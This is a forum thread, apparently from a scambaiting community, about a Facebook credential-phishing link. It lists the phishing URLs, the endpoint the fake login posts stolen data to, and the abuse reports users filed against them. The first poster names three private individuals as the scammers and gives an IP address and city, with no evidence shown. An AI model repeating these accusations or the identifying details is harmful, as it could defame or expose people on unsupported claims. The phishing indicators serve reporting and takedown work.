the other day i was enjoying myself and i was texted with an interesting link that led to a “facebook login” which they use to steal your login info to get into your account. i gave them some bait and let them access my facebook, but changed the password right after getting their ip address, the link they sent had a caption attached that said:
Wow i can’t belive it💔
https://6ta.eu/0qCOS
there are 3 known individuals that are involved with this scam and they are
Phaidra Weaver (Ecchiwolf)
Jahmir Williams
and their leader Damien Garcia-nakata Akira
which are all friends and work together. I wouldn’t doubt that there are more than the 3 of them, but these 3 are the most active with stealing peoples personal information
earlier i mentioned an IP address
that IP is 104.172.93.249 which they are located in San Bernardino, CA, united states. that’s all the information i have at this time. i really hope someone can do something with all of this because i’ve been harassed by these people for months and police won’t do anything about it. i don’t know where to go besides here
Hmm so they’re collecting FB logins and passwords? Probably so they can use the info to impersonate people to scam others that may know the people they’re impersonating. Try reaching out to Jim Browning on YouTube, if you can reach him, he might be able to help.
Taking their website out now! thanks for the report.
Info I got on Ecchiwolf:ecchiwolf Username | Find ecchiwolf or Search for Availability
https://6ta.eu/0qCOS Has been reported.
Here’s what I’ve got (you guys probably found most of this already):
tldr; Goes through Cloudflare, I reported it to them. Form data sent to `cranky.icu` which I can't find anything about and has a suspicious `ip` parameter that I think is some kind of a red herring, but I'm not totally sure what's going on with it.
Their website is being served over Cloudflare.
Although Cloudflare isn't hosting the website, they are just hosting a reverse proxy that connects to the actual website. <bad-analogy>If the website is a house, a reverse proxy is like a road to the house that your request travels to.</bad-analogy> Reporting this to Cloudflare won't get rid of the underlying website, but it will mean that (temporarily) nobody will be able to access it (almost certainly). Their abuse form says:
“Cloudflare does not tolerate the distribution of malware or serving phishing content through the service. Legitimate reports of phishing and malware URLs will be promptly acted upon.”
You didn't mention it, so I'm assuming that you haven't reported it to Cloudflare yet, so I did it just now.
When you enter your login data, it packages it up and sends it to this URL:
-> `https://cranky.icu/login?name=daniel&ip=45.154.255.75`
The IP parameter changes, but seems to always be in Sweden (under different ISPs).
At first, I thought `cranky.icu` (195.133.192.86, different services disagree on location) was one of the many ad trackers placed on the site, but just going to `cranky.icu` yields 403 Forbidden. I checked, and `cranky.icu` is not hosted on Cloudflare, all I could find was that it is just someone running an Apache server on Debian.
One more thing, I just reported them to the Firefox phishing protection service and their domain registrar (OpenProvider) for both </s>6ta.eu<e> and </s>cranky.icu<e> too. They tried to make </s>6ta.eu<e> look like a URL shortener to make it seem like they weren’t responsible, but the homepage is just an iframe displaying the contents of </s>https://shorturl.at/<e>
@Scambait_Sluth#189045 welcome in 
https://6ta.eu/0qCOS no longer works
You guys are great and hopefully many others will join with you to help keep up the good work.
Anyhow, it appears these losers are still at it, because I received a private facebook message yesterday from a friend whose account has apparently been compromised by them. I tried to post a screen shot but I couldn't figure out how to do it, so if it's possible to do then I'll need some assistance.
This is link address from the message:
https://6ta.eu/UgIFYSMN4w
@YettiBlake#189854 Facebook phishing
For next time, you can use an image hosting service such as Imgur to link screenshots. Can embed them as well by doing:
```
[IMG]https://example.com/image.png[/IMG]
```[[3,9,25,27,41,58,72],[3,25,41]]